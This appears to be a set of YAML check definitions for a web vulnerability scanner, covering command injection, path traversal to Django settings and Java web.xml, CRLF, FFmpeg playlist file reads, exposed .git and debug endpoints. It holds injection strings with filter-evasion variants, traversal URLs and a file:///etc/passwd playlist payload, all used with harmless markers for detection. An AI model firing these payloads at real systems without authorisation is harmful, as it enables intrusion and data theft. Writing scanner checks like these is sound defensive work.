| - body: "Parsing Schema: unexpected" 263 | - body: "Parsing Schema: unresolved" 264 | - body: "has no name attribute" 265 | - body: 'Parsing WSDL: Could not find any usable binding services in WSDL\.' 
266 | - body: "Parsing WSDL: Couldn't bind to service" 267 | - body: "Parsing WSDL: Couldn't find" 268 | - body: "Parsing WSDL: Couldn't load from" 269 | - body: "Parsing WSDL: Missing 'name' attribute for" 270 | - body: "Parsing WSDL: Missing 'type' attribute for" 271 | - body: "Parsing WSDL: Missing message attribute for" 272 | - body: "Parsing WSDL: Missing name for" 273 | - body: "Parsing WSDL: Missing part '%s' in" 274 | - body: "Parsing WSDL: Missing part attribute for" 275 | - body: "Parsing WSDL: No element with name" 276 | - body: "Parsing WSDL: No address associated with" 277 | - body: "Parsing WSDL: No binding associated with" 278 | - body: "Parsing WSDL: No location associated with" 279 | - body: "Parsing WSDL: No name associated with" 280 | - body: "Parsing WSDL: The fault message" 281 | - body: "Parsing WSDL: Unexpected WSDL element" 282 | - body: "Parsing WSDL: Unexpected extensibility element" 283 | - body: "Parsing WSDL: Unknown encodingStyle" 284 | - body: "Parsing WSDL: Unknown required WSDL extension" 285 | - body: "Parsing WSDL: Unspecified encodingStyle" 286 | - body: "Possible integer overflow in memory allocation" 287 | - body: "Second array member is not a valid method" 288 | - body: "Spoofchecker class not defined" 289 | - body: "String size overflow" 290 | - body: "The object to be iterated is in an invalid state:" 291 | - body: "Trying to clone an uncloneable object" 292 | - body: "Trying to clone an uncloneable object of class" 293 | - body: "Unable to call" 294 | - body: "Unable to cast node to string" 295 | - body: "Undefined class constant" 296 | - body: "Undefined constant" 297 | - body: "Undefined offset for object of type" 298 | - body: 'Unexpected inconsistency in create_function\(\)' 299 | - body: "Unknown SOAP version" 300 | - body: "Unknown typehint" 301 | - body: "Unsupported operand types" 302 | - body: "Using $this when not in object context" 303 | - body: "Wrong parameters for ErrorException" 304 | - body: "Wrong 
parameters for Exception" 305 | - body: "You MUST load PDO before loading any PDO drivers" 306 | - body: "operator not supported for strings" 307 | - body: "and must therefore be declared abstract or implement the remaining methods" 308 | - body: "namespace must not match the enclosing schema 'targetNamespace'" 309 | - body: "requires PDO API version" 310 | - body: 'class java\.lang\.' 311 | - body: 'java\.lang\.NullPointerException' 312 | - body: 'java\.rmi\.ServerException' 313 | - body: 'at java\.lang\.' 314 | - body: 'at org\.apache\.catalina' 315 | - body: 'at org\.apache\.coyote\.' 316 | - body: 'at org\.apache\.tomcat\.' 317 | - body: 'at org\.apache\.jasper\.' 318 | - body: "Microsoft VBScript runtime" 319 | - body: "Application uses a value of the wrong type for the current operation" 320 | - body: "Microsoft VBScript compilation" 321 | - body: 'Microsoft \.NET Framework Version:' 322 | - body: 'A trappable error occurred in an external object\. The script cannot continue running' 323 | - body: "Microsoft VBScript runtime Error" 324 | - body: 'ADODB\.Command' 325 | - body: "Object required:" 326 | - body: 'eval\(\).d code on line' 327 | - body: "Encoding: '*' may only be first arraySize value in list" 328 | - body: 'Warning: fopen\(' 329 | - body: 'Warning: fpassthru\(' 330 | - body: 'Warning.*include_once\(\): Failed opening' 331 | - body: 'Warning.*include_once\(.*\): failed to' 332 | - body: 'Warning.*include\(\): Failed opening' 333 | - body: 'Warning.*include\(.*\): failed to' 334 | - body: 'java\.lang\.IllegalArgumentException' 335 | - body: 'Request processing failed' 336 | - body: 'org\.springframework\.jdbc\.BadSqlGrammarException:' 337 | - body: 'java\.sql\.SQLSyntaxErrorException:' 338 | - body: '<\/b> on line <b>(.*)' 339 | - body: '<b>Warning<\/b>: (.*)' 340 | - body: 'no such function' 341 | 342 | meta-info: 343 | - type: info 344 | - threat: 30 345 | - tags: 346 | - Application Errors 347 | - OWASP Top 10 348 | - OWASP 349 | 
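--------------------------------------------------------------------------------
/bak-files.yaml:
--------------------------------------------------------------------------------
# Appends backup-style suffixes to every unique action name that has a file
# extension and reports responses whose Content-Type is not html/json/xml.
# NOTE(review): a server that answers unknown paths with some other content
# type (a text/plain error page, for instance) would match as well. Check
# whether the engine also looks at the status code before trusting a hit.
collect:
  - uniq:
      - [ACTION_NAME]
match:
  - ACTION_EXT: ".*" # any file extension like /filename\..*/
generate:
  - payload:
      - .bak
      - .old
      - .tmp
  - into: URI
  - method:
      - postfix
detect:
  - response:
      - headers:
          - 'Content-Type': '!(html|json|xml)'
meta-info:
  - type: idor
  - threat: 60
  - tags:
      - Temporary Files
      - Source Code Disclosure
      - Misconfiguration
      - Insecure Direct Object References
      - Broken Access Control
      - OWASP
      - OWASP Top-10
      - A4:2010
      - A4:2013
      - A5:2017
--------------------------------------------------------------------------------
/command-injection-linux.yaml:
--------------------------------------------------------------------------------
# Shell command-injection check for Unix-like targets. A finding is raised on
# a DNS callback for DNS_MARKER or when CALC_MARKER appears in the response
# body (presumably the evaluated arithmetic result; confirm against the DSL).
generate:
  - payload:
      #For QUICK scan profile. DNS_MARKER & CALC_MARKER.
      - ";getent hosts DNS_MARKER;echo $((CALC_MARKER));"
      - ";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));"
      - "';getent hosts DNS_MARKER;echo $((CALC_MARKER));'"
      - "';getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));'"
      # Was "geten host": no such command, so this double-quoted variant could
      # never produce the DNS callback. Spelled like its siblings now.
      - "\";getent hosts DNS_MARKER;echo $((CALC_MARKER));\""
      - "\";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));\""
      - "`getent hosts DNS_MARKER;echo $((CALC_MARKER))`"
      - "`getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))`"
      - "|getent hosts DNS_MARKER;echo $((CALC_MARKER))"
      - "|getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))"
      # Both newline-delimited variants were spelled "gentent"; same fix.
      - "x\ngetent hosts DNS_MARKER;echo $((CALC_MARKER))\nx"
      - "x\ngetent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))\nx"
      - "$(getent hosts DNS_MARKER;ping -c1 DNS_MARKER)"
      - "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"

      #For INTENSIVE scan profile. May be useful for the limited size of the parameter or WAF bypass.
      #CALC_MARKER
      #- ";echo $((CALC_MARKER));"
      #- ";echo$IFS$9$((CALC_MARKER));"
      #- "';echo $((CALC_MARKER));'"
      #- "';echo$IFS$9$((CALC_MARKER));'"
      #- "\";echo $((CALC_MARKER));\""
      #- "\";echo$IFS$9$((CALC_MARKER));\""
      #- "`echo $((CALC_MARKER))`"
      #- "`echo$IFS$9$((CALC_MARKER))`"
      #- "|echo $((CALC_MARKER))"
      #- "|echo$IFS$9$((CALC_MARKER))"
      #- "x\necho$IFS$9$((CALC_MARKER))\nx"

      #getent hosts DNS_MARKER
      #- ";getent hosts DNS_MARKER;"
      #- ";getent$IFS$9hosts$IFS$9DNS_MARKER;"
      #- "';getent hosts DNS_MARKER;'"
      #- "';getent$IFS$9hosts$IFS$9DNS_MARKER;'"
      #- "\";getent hosts DNS_MARKER;\""
      #- "\";getent$IFS$9hosts$IFS$9DNS_MARKER;\""
      #- "`getent hosts DNS_MARKER`"
      #- "`getent$IFS$9hosts$IFS$9DNS_MARKER`"
      #- "|getent hosts DNS_MARKER"
      #- "|getent$IFS$9hosts$IFS$9DNS_MARKER"
      #- "x\ngetent$IFS$9hosts$IFS$9DNS_MARKER\nx"
      #- "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"

      #ping DNS_MARKER
      #- ";ping -c1 DNS_MARKER;"
      #- ";ping$IFS$9-c1$IFS$9DNS_MARKER;"
      #- "';ping -c1 DNS_MARKER;'"
      #- "';ping$IFS$9-c1$IFS$9DNS_MARKER;'"
      #- "\";ping -c1 DNS_MARKER;\""
      #- "\";ping$IFS$9-c1$IFS$9DNS_MARKER;\""
      #- "`ping -c1 DNS_MARKER`"
      #- "`ping$IFS$9-c1$IFS$9DNS_MARKER`"
      #- "|ping -c1 DNS_MARKER"
      #- "|ping$IFS$9-c1$IFS$9DNS_MARKER"
      #- "x\nping$IFS$9-c1$IFS$9DNS_MARKER\nx"
      #- "$(ping$IFS$9-c1$IFS$9DNS_MARKER)"

  - method:
      - postfix
      - replace

detect:
  - oob:
      - dns
  - response:
      - body: CALC_MARKER

meta-info:
  - type: rce
  - threat: 95
  - tags:
      - OS Commanding
      - RCE
      - Remote Code Execution
      - Shell injection
      - Command injection
      - OWASP Top 10
      - OWASP
--------------------------------------------------------------------------------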
/command-injection-windows.yaml:
--------------------------------------------------------------------------------
# Command-injection check for Windows targets. The nslookup variants are
# confirmed by a DNS callback for DNS_MARKER, the `set /a` variants by
# CALC_MARKER appearing in the response body.
generate:
  - payload:
      #For QUICK scan profile. DNS_MARKER & CALC_MARKER.
      - "& nslookup DNS_MARKER &"
      - "'& nslookup DNS_MARKER'"
      - "\"& nslookup DNS_MARKER\""
      - "| nslookup DNS_MARKER"
      - "'| nslookup DNS_MARKER'"
      - "\"| nslookup DNS_MARKER\""
      - "& set /a CALC_MARKER &"
      - "'& set /a CALC_MARKER'"
      - "\"& set /a CALC_MARKER\""
      - "| set /a CALC_MARKER"
      - "'| set /a CALC_MARKER'"
      - "\"| set /a CALC_MARKER\""

      #For INTENSIVE scan profile. May be useful for the limited size of the parameter or WAF bypass.
      # DNS_MARKER
      # - "& nslookup DNS_MARKER &"
      # - "&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER%PROGRAMFILES:~10,-5%&"
      # - "'& nslookup DNS_MARKER'"
      # - "'&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER'"
      # - "\"& nslookup DNS_MARKER\""
      # - "\"&%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER\""
      # - "| nslookup DNS_MARKER"
      # - "|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER"
      # - "'| nslookup DNS_MARKER'"
      # - "'|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER'"
      # - "\"| nslookup DNS_MARKER\""
      # - "\"|%PROGRAMFILES:~10,-5%nslookup%PROGRAMFILES:~10,-5%DNS_MARKER\""
      #CALC_MARKER
      # - "& set /a CALC_MARKER &"
      # - "&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER%PROGRAMFILES:~10,-5%&"
      # - "'&set /a CALC_MARKER'"
      # - "'&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER'"
      # - "\"& set /a CALC_MARKER\""
      # - "\"&%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER\""
      # - "| set /a CALC_MARKER"
      # - "|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER"
      # - "'| set /a CALC_MARKER'"
      # - "'|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER'"
      # - "\"| set /a CALC_MARKER\""
      # - "\"|%PROGRAMFILES:~10,-5%set%PROGRAMFILES:~10,-5%/a%PROGRAMFILES:~10,-5%CALC_MARKER\""

  - method:
      - postfix
      - replace

detect:
  - oob:
      - dns
  - response:
      - body: CALC_MARKER

meta-info:
  - type: rce
  - threat: 95
  - tags:
      - OS Commanding
      - RCE
      - Remote Code Execution
      - Shell injection
      - Command injection
      - OWASP Top 10
      - OWASP
      - Windows command injection
--------------------------------------------------------------------------------
/crlf.yaml:
--------------------------------------------------------------------------------
# Appends an encoded line break followed by a marker header to each unique URI
# and reports the case where that header comes back in the response headers.
collect:
  - uniq:
      - [ URI ]
generate:
  - payload:
      - "%0d%0ax-crlf-header: STR_MARKER"
      - "%0ax-crlf-header: STR_MARKER"
  - method:
      - postfix
detect:
  - response:
      - headers:
          - 'x-crlf-header': 'STR_MARKER'
meta-info:
  - type: info
  - threat: 30
  - tags:
      - CRLF
      - Injection
--------------------------------------------------------------------------------
/directory-listing.yaml:
--------------------------------------------------------------------------------
# Replaces the tested value with a system directory path and looks for the
# names of files expected in that directory, in listing order, in the body.
collect:
  - uniq:
      - [ URI ]
generate:
  - payload:
      - /etc
      - /dev
  - method:
      - replace
detect:
  - response:
      - body: '(passwd).*(shadow-).*(localtime)'
      - body: '(core).*(stdout).*(null)'
meta-info:
  - type: ptrav
  - threat: 80
  - tags:
      - Path Traversal
      - Misconfiguration
      - Directory Listing
      - Insecure Direct Object References
      - Broken Access Control
      - OWASP
      - OWASP Top-10
--------------------------------------------------------------------------------
/django_nginx_alias_traversal.yaml:
--------------------------------------------------------------------------------
1 |
#Attention! You have to add URI_.* insertion point to your policy 2 | send: 3 | - method: 'GET' 4 | url: '/static../manage.py' 5 | 6 | - method: 'GET' 7 | url: '/media../manage.py' 8 | 9 | - method: 'GET' 10 | url: '/uploads../manage.py' 11 | 12 | - method: 'GET' 13 | url: '/static../__init__.py' 14 | 15 | - method: 'GET' 16 | url: '/media../__init__.py' 17 | 18 | - method: 'GET' 19 | url: '/uploads../__init__.py' 20 | 21 | - method: 'GET' 22 | url: '/static../settings.py' 23 | 24 | - method: 'GET' 25 | url: '/media../settings.py' 26 | 27 | - method: 'GET' 28 | url: '/uploads../settings.py' 29 | 30 | - method: 'GET' 31 | url: '/static../apps/settings.py' 32 | 33 | - method: 'GET' 34 | url: '/media../apps/settings.py' 35 | 36 | - method: 'GET' 37 | url: '/uploads../apps/settings.py' 38 | 39 | - method: 'GET' 40 | url: '/static../dev/settings.py' 41 | 42 | - method: 'GET' 43 | url: '/media../dev/settings.py' 44 | 45 | - method: 'GET' 46 | url: '/uploads../dev/settings.py' 47 | 48 | - method: 'GET' 49 | url: '/static../production/settings.py' 50 | 51 | - method: 'GET' 52 | url: '/media../production/settings.py' 53 | 54 | - method: 'GET' 55 | url: '/uploads../production/settings.py' 56 | 57 | - method: 'GET' 58 | url: '/static../project/settings.py' 59 | 60 | - method: 'GET' 61 | url: '/media../project/settings.py' 62 | 63 | - method: 'GET' 64 | url: '/uploads../project/settings.py' 65 | 66 | - method: 'GET' 67 | url: '/static../mysite/settings.py' 68 | 69 | - method: 'GET' 70 | url: '/media../mysite/settings.py' 71 | 72 | - method: 'GET' 73 | url: '/uploads../mysite/settings.py' 74 | 75 | - method: 'GET' 76 | url: '/static../website/settings.py' 77 | 78 | - method: 'GET' 79 | url: '/media../website/settings.py' 80 | 81 | - method: 'GET' 82 | url: '/uploads../website/settings.py' 83 | 84 | detect: 85 | - response: 86 | - body: 'from django\.core\.management import execute_from_command_line' 87 | - body: 'from django.* import' 88 | - body: 
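'''django\.contrib\.staticfiles'',' 89 | 90 | meta-info: 91 | - type: ptrav 92 | - threat: 70 93 | - applicable_for: 94 | - fast 95 | - scanner 96 | - tags: 97 | - Django 98 | - NGINX alias traversal 99 | - Misconfiguration 100 | - Path Traversal 101 | -------------------------------------------------------------------------------- /expression-language-injection.yaml: --------------------------------------------------------------------------------
# Expression-language injection check.
# Replaces the tested value with '${CALC_MARKER}' and reports a finding when
# CALC_MARKER shows up in the response body.
# NOTE(review): presumably CALC_MARKER expands to an arithmetic expression in
# the payload and to its computed result in `detect` - confirm. If the marker
# were compared literally, an application that merely echoes its input would
# be reported as well.
generate:
  # NOTE(review): `method` is a key of the same list item as `payload` here,
  # while ffmpeg-uploads.yaml below uses a separate `- method:` item. Confirm
  # the parser accepts both spellings; otherwise this check may silently use
  # a default insertion method.
  - payload:
      - '${CALC_MARKER}'
    method:
      - replace

detect:
  - response:
      - body: CALC_MARKER

meta-info:
  - threat: 60
  # NOTE(review): a server-side expression being evaluated is a code-injection
  # class finding rather than XSS; confirm `xss` is the intended type, since
  # it drives how the finding is triaged.
  - type: xss
  - tags: # TODO: OWASP, CWE, WASC references
      - EL injection
      - Spring Framework
      - expression language injection

-------------------------------------------------------------------------------- /ffmpeg-uploads.yaml: --------------------------------------------------------------------------------
# Media-upload processing check.
# Applies only to multipart file parameters (`match`). The uploaded file is
# replaced with an HLS playlist whose single entry is either a local file URL
# or an http URL pointing at DNS_MARKER.
# A finding is reported when the response body contains a passwd-shaped line
# or when a DNS interaction for DNS_MARKER is observed.
# Triage: a hit suggests the server hands uploads to a media tool that
# follows playlist entries. Typical hardening is to restrict the protocols
# the tool may open for untrusted input (FFmpeg: -protocol_whitelist) and to
# run the conversion in a sandbox without network or host filesystem access.
collect:
  - uniq:
      - [ URI ]
match:
  - POST_MULTIPART_.*_FILE: '.*'
generate:
  - payload:
      # The '#EXT...' lines below are playlist content inside a literal block
      # scalar, not YAML comments.
      - !!str |
        #EXTM3U
        #EXT-X-MEDIA-SEQUENCE:0
        #EXTINF:10.0,
        file:///etc/passwd
        #EXT-X-ENDLIST
      - !!str |
        #EXTM3U
        #EXT-X-MEDIA-SEQUENCE:0
        #EXTINF:10.0,
        http://DNS_MARKER
        #EXT-X-ENDLIST
  - method:
      - replace
  - into: 'POST_MULTIPART_.*_FILE'
detect:
  - response:
      # Seven colon-separated fields with numeric 3rd and 4th fields and
      # '/'-prefixed 6th and 7th fields, i.e. the shape of a passwd entry.
      - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
  - oob:
      - dns
meta-info:
  # NOTE(review): what this check demonstrates is a local file read or an
  # outbound request, not command execution; confirm that `rce` and the
  # 'OS Commanding' tag are the intended classification.
  - type: rce
  - threat: 95
  - tags:
      - OS Commanding
      - FFMPEG
      # Tag spelling corrected from 'Arbitraty' so it matches the
      # 'Arbitrary File Reading' tag used by the path-traversal checks.
      - Arbitrary File Reading
      - OWASP Top 10
      - OWASP
-------------------------------------------------------------------------------- /git-log-output.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [ URI ] 4 | generate: 5 | - into: URI 6 | detect: 7 | - response: 8 | - body: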
'commit\s[a-f0-9]{40}.*(\n+)Author\:.*\nDate\:' 9 | - body: 'commit[s]?.[a-f0-9]{40}' 10 | meta-info: 11 | - type: info 12 | - threat: 30 13 | - tags: 14 | - Information Exposure 15 | -------------------------------------------------------------------------------- /git.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/.git/index' 4 | 5 | detect: 6 | - response: 7 | - body: ^DIRC 8 | 9 | meta-info: 10 | - type: info 11 | - threat: 30 12 | - applicable_for: 13 | - fast 14 | - tags: 15 | - GIT 16 | - Source Code Disclosure 17 | - Misconfiguration 18 | - Directory Listing 19 | - Insecure Direct Object References 20 | - Broken Access Control 21 | - OWASP 22 | - OWASP Top-10 23 | - A4:2010 24 | - A4:2013 25 | - A5:2017 -------------------------------------------------------------------------------- /graphql.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'POST' 3 | url: '/graphql' 4 | headers: 5 | - Content-Type: application/json 6 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}' 7 | 8 | - method: 'POST' 9 | url: '/api/graphql' 10 | headers: 11 | - Content-Type: application/json 12 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}' 13 | 14 | - method: 'POST' 15 | url: '/graphql/' 16 | headers: 17 | - Content-Type: application/json 18 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}' 19 | 20 | - method: 'POST' 21 | url: '/-/graphql-explorer' 22 | headers: 23 | - Content-Type: application/json 24 | body: '{"query":"query {__schema{types {name}}}","variables":{},"operationName":null}' 25 | 26 | detect: 27 | - response: 28 | - body: '{"data":{"__schema"' 29 | 30 | meta-info: 31 | - title: "Disclosure of technical information at Graphql" 32 | - description: "Technical disclosure at GraphQL may cause information leakage. 
In case of improper configuration, a malicious user may get some critical information and use it for other attacks." 33 | - type: info 34 | - threat: 20 35 | - applicable_for: 36 | - fast 37 | - scanner 38 | - tags: 39 | - Graphql 40 | - Information Exposure 41 | -------------------------------------------------------------------------------- /httpoxy.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [ HEADER_HOST ] # only check for each single domain name because of environment nature of this bug 4 | generate: 5 | - payload: 6 | - "http://DNS_MARKER" 7 | - method: 8 | - replace 9 | - into: HEADER_HTTP_PROXY 10 | detect: 11 | - oob: 12 | - dns 13 | meta-info: 14 | - type: info 15 | - threat: 50 16 | - tags: 17 | - SSRF 18 | - Server Side Request Forgery 19 | - Link Injection 20 | - HTTPoxy # TODO: CVE reference 21 | -------------------------------------------------------------------------------- /java-web-inf-parameter.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - "WEB-INF/web.xml" 4 | - "WEB-INF/./web.xml" 5 | - "WEB-INF/.../web.xml" 6 | - "WEB-INF/././web.xml" 7 | - "WEB-INF/../../WEB-INF/web.xml" 8 | - "WEB-INF/../../../WEB-INF/web.xml" 9 | - "WEB-INF/./xxx/../web.xml" 10 | - "WEB-INF/./xxx/yyy/../../web.xml" 11 | - "../WEB-INF/web.xml" 12 | - "../../../../WEB-INF/web.xml" 13 | - "../../WEB-INF/web.xml" 14 | - "../WEB-INF/web.xml;x=" 15 | - "../../WEB-INF/web.xml;x=" 16 | - "../../../WEB-INF/web.xml;x=" 17 | - "%c0%ae/WEB-INF/web.xml" 18 | - "%c0%ae/%c0%ae/WEB-INF/web.xml" 19 | - "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" 20 | 21 | detect: 22 | - response: 23 | - body: '<web-app[\w\W]+<\/web-app>' 24 | 25 | meta-info: 26 | - title: "Java web.xml information leakage vulnerability" 27 | - description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of 
configuration information." 28 | - type: info 29 | - threat: 20 30 | - tags: 31 | - Information Exposure 32 | - Java 33 | - web-inf 34 | - tomcat 35 | - JBoss 36 | - J2EE 37 | -------------------------------------------------------------------------------- /java-web-inf-uri.yaml: -------------------------------------------------------------------------------- 1 | # you have to add URI_.* insertion point to your policy 2 | send: 3 | - method: 'GET' 4 | url: "/WEB-INF/web.xml" 5 | 6 | - method: 'GET' 7 | url: "/web-inf/web.xml" 8 | 9 | - method: 'GET' 10 | url: "/WEB-INF./web.xml" 11 | 12 | - method: 'GET' 13 | url: "/../WEB-INF/web.xml" 14 | 15 | - method: 'GET' 16 | url: "/../../WEB-INF/web.xml" 17 | 18 | - method: 'GET' 19 | url: "/../../../WEB-INF/web.xml" 20 | 21 | - method: 'GET' 22 | url: "/../../../../WEB-INF/web.xml" 23 | 24 | - method: 'GET' 25 | url: "/demo/../WEB-INF/web.xml" 26 | 27 | - method: 'GET' 28 | url: "/wiki/struts/..%252f..%252f/WEB-INF/web.xml" 29 | 30 | - method: 'GET' 31 | url: "/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml" 32 | 33 | - method: 'GET' 34 | url: "/..;/WEB-INF/web.xml" 35 | 36 | - method: 'GET' 37 | url: "/..;/..;/WEB-INF/web.xml" 38 | 39 | - method: 'GET' 40 | url: "/..%3B/WEB-INF/web.xml" 41 | 42 | - method: 'GET' 43 | url: "/..%253B/WEB-INF/web.xml" 44 | 45 | - method: 'GET' 46 | url: "/plugins//../WEB-INF/web.xml%C0%80.jsp" 47 | 48 | - method: 'GET' 49 | url: "/js/app//../WEB-INF/web.xml%C0%80.jsp" 50 | 51 | - method: 'GET' 52 | url: "/js/app//../WEB-INF/web.xml" 53 | 54 | - method: 'GET' 55 | url: "/js/app//../../WEB-INF/web.xml" 56 | 57 | - method: 'GET' 58 | url: "/ctxroot/%C0%AE/WEB-INF/web.xml" 59 | 60 | - method: 'GET' 61 | url: "/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml" 62 | 63 | - method: 'GET' 64 | url: "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml" 65 | 66 | - method: 'GET' 67 | url: "/js/app/../../WEB-INF/web.xml%3bx%3d/" 68 | 69 | - method: 'GET' 70 | url: 
"/js/app/1//../../WEB-INF/web.xml%C0%80.jsp" 71 | 72 | - method: 'GET' 73 | url: "/%c0%ae/WEB-INF/web.xml" 74 | 75 | - method: 'GET' 76 | url: "/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml" 77 | 78 | - method: 'GET' 79 | url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml" 80 | 81 | - method: 'GET' 82 | url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml" 83 | 84 | - method: 'GET' 85 | url: "/WEB-INF/web.xml;x=" 86 | 87 | - method: 'GET' 88 | url: "/../WEB-INF/web.xml;x=" 89 | 90 | - method: 'GET' 91 | url: "/../../WEB-INF/web.xml;x=" 92 | 93 | - method: 'GET' 94 | url: "/../../../WEB-INF/web.xml;x=" 95 | 96 | detect: 97 | - response: 98 | - body: '<web-app[\w\W]+<\/web-app>' 99 | 100 | meta-info: 101 | - title: "Java web.xml information leakage vulnerability" 102 | - description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information." 103 | - type: info 104 | - threat: 20 105 | - applicable_for: 106 | - fast 107 | - scanner 108 | - tags: 109 | - Information Exposure 110 | - Java 111 | - web-inf 112 | - tomcat 113 | - JBoss 114 | - J2EE 115 | -------------------------------------------------------------------------------- /jenkins-pre-auth.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: GET 3 | url: /securityRealm/user/admin/api/xml 4 | 5 | detect: 6 | - response: 7 | - body: "<user _class='hudson.model.User'>" 8 | 9 | meta-info: 10 | - type: info 11 | - threat: 43 12 | - applicable_for: 13 | - fast 14 | - scanner 15 | - tags: 16 | - Jenkins 17 | - Information Leak 18 | - CVE-2017-1000395 19 | - Pre-auth User Information Leakage 20 | -------------------------------------------------------------------------------- /laravel-debugger.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/telescope' 4 | 5 | - method: 'GET' 6 | url: 
'/logs' 7 | 8 | - method: 'GET' 9 | url: '/debugbar.js' 10 | 11 | - method: 'GET' 12 | url: '/' 13 | 14 | detect: 15 | - response: 16 | - body: '<title>Telescope - Laravel<\/title>' 17 | - body: '<title>Laravel log viewer<\/title>' 18 | - body: 'PhpDebugBar\.DebugBar\(\);' 19 | - body: '(src="debugbar/debugbar\.js")|(src="debugbar\.js")' 20 | 21 | meta-info: 22 | - type: info 23 | - threat: 67 24 | - applicable_for: 25 | - fast 26 | - scanner 27 | - tags: 28 | - Laravel 29 | - PHP Debug Bar 30 | - Infoleak 31 | -------------------------------------------------------------------------------- /memstats.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/debug/vars' 4 | 5 | detect: 6 | - response: 7 | - body: '"Alloc":\d+,"TotalAlloc":\d+,"Sys":\d+,"Lookups":\d+,"Mallocs":\d+,"Frees":\d+' 8 | 9 | meta-info: 10 | - title: "Disclosure of technical information at MemStats allocator statistics." 11 | - description: "The vulnerability is due to a lack of authorization when accessing the resource '/debug/vars'. As a result, the malicious user may obtain information of a technical nature and use it for other attacks." 
12 | - type: info 13 | - threat: 20 14 | - applicable_for: 15 | - fast 16 | - scanner 17 | - tags: 18 | - Infoleak 19 | - Disclosure of technical information -------------------------------------------------------------------------------- /nginx-server-status.yaml: -------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: '/nginx_status' 4 | 5 | - method: 'GET' 6 | url: '/nginx-status' 7 | 8 | detect: 9 | - response: 10 | - body: "Active connections" 11 | - body: "server accepts handled requests" 12 | meta-info: 13 | - type: info 14 | - threat: 20 15 | - applicable_for: 16 | - fast 17 | - tags: 18 | - Nginx server status 19 | - Disclosure of technical information 20 | - CWE-200 Information Exposure -------------------------------------------------------------------------------- /nosqli.yaml: -------------------------------------------------------------------------------- 1 | generate: 2 | - payload: 3 | - "'\"\\;{}" 4 | 5 | detect: 6 | - response: 7 | - body: "SyntaxError:.*literal not terminated before end of script" 8 | - body: "SyntaxError: Unexpected token" 9 | - body: "MongoError: SyntaxError: unterminated string literal" 10 | 11 | meta-info: 12 | - type: nosqli 13 | - threat: 60 14 | - tags: 15 | - OWASP Top 10 16 | - Application Errors 17 | - NoSQL injection 18 | -------------------------------------------------------------------------------- /ntfs-alternative-streams.yaml: -------------------------------------------------------------------------------- 1 | collect: 2 | - uniq: 3 | - [ URI ] 4 | generate: 5 | - payload: 6 | - "::$DATA" 7 | - "::$INDEX_ALLOCATION" 8 | - ":$I30:$INDEX_ALLOCATION" 9 | - into: 10 | - ACTION_EXT 11 | - ACTION_NAME 12 | - PATH 13 | - method: 14 | - postfix 15 | detect: 16 | - response: 17 | - headers: 18 | - 'Content-Type': '.*binary.*' 19 | meta-info: 20 | - type: idor 21 | - threat: 60 22 | - tags: 23 | - Source Code Disclosure 24 | - Misconfiguration 25 | - Directory 
